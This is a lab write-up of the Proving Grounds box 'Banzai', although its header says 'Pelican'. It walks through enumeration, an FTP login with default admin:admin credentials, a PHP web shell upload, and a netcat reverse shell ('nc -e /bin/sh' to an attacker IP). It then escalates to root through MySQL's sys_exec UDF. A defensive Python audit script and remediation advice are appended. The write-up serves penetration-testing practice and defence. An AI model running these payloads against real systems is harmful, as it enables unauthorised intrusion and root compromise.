Banzai

Writeup for Pelican from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.141.56 all

Service Enumeration

HTTP (Port 8295)

Doesn't look like there's anything useful here.

SMTP (Port 25)

SMTP user enumeration.

We got the users from SMTP; however, they all need a password to authenticate.

FTP (Port 21)

We try admin:admin and we are authenticated!

The files here look very similar to our gobuster result on the web app on port 8295, maybe we can add a PHP web shell and access it from port 8295.

Exploit

Let's upload our web shell onto the FTP server.

Let's navigate to our web shell and we have RCE!

Let's get our interactive shell.

Payload: nc -e /bin/sh 192.168.49.141 22

Privesc

Looks like MySQL is running as root, and we have credentials for it.

We can follow this trick to gain root.

Looks like lib_mysqludf_sys.so is missing from our target machine, so let's download it to our attack machine and transfer it to the target.

Let's check if our target machine is 32 or 64 bit.

Once we transfer the files, we can try getting a reverse shell.

Payload:

select sys_exec('nc -e /bin/sh 192.168.49.141 22');
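
A defender-side check for the two conditions this privilege escalation depends on: a mysqld process owned by root, and a command-execution UDF from lib_mysqludf_sys registered in the server. This is an added example, not part of the original writeup; the `ps` output and `mysql.func` rows are constructed samples, and `sys_eval` is included as the other command-running function that library exports.

```python
# UDF names exported by lib_mysqludf_sys that run OS commands.
RISKY_UDFS = {"sys_exec", "sys_eval"}
RISKY_LIB = "lib_mysqludf_sys"

# Constructed sample: output of `ps -eo user,pid,args`.
SAMPLE_PS = """\
USER       PID COMMAND
root       612 /usr/sbin/mysqld --daemonize
www-data   701 /usr/sbin/apache2 -k start
"""
# Constructed sample: mysql -N -B -e "SELECT name, dl FROM mysql.func"
SAMPLE_FUNC = "sys_exec\tlib_mysqludf_sys.so\nmy_sum\tstats_udf.so\n"

def mysqld_users(ps_text):
    """Return the set of OS accounts that own a mysqld/mariadbd process."""
    users = set()
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, _pid, args = parts
        # Compare the executable's basename so mysqld_safe (run via sh) is ignored.
        if args.split()[0].rsplit("/", 1)[-1] in ("mysqld", "mariadbd"):
            users.add(user)
    return users

def risky_udfs(func_text):
    """Return (name, library) pairs for registered command-execution UDFs."""
    hits = []
    for row in func_text.splitlines():
        if "\t" not in row:
            continue
        name, dl = row.split("\t", 1)
        if name.lower() in RISKY_UDFS or RISKY_LIB in dl.lower():
            hits.append((name, dl))
    return hits

def audit(ps_text, func_text):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    if "root" in mysqld_users(ps_text):
        findings.append("mysqld runs as root: UDFs execute with root privileges")
    for name, dl in risky_udfs(func_text):
        findings.append(f"command-execution UDF registered: {name} ({dl})")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_PS, SAMPLE_FUNC):
        print("[!]", finding)
```

Either finding alone is worth fixing: run mysqld under a dedicated unprivileged account, and drop any UDF that is not expected on the host.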
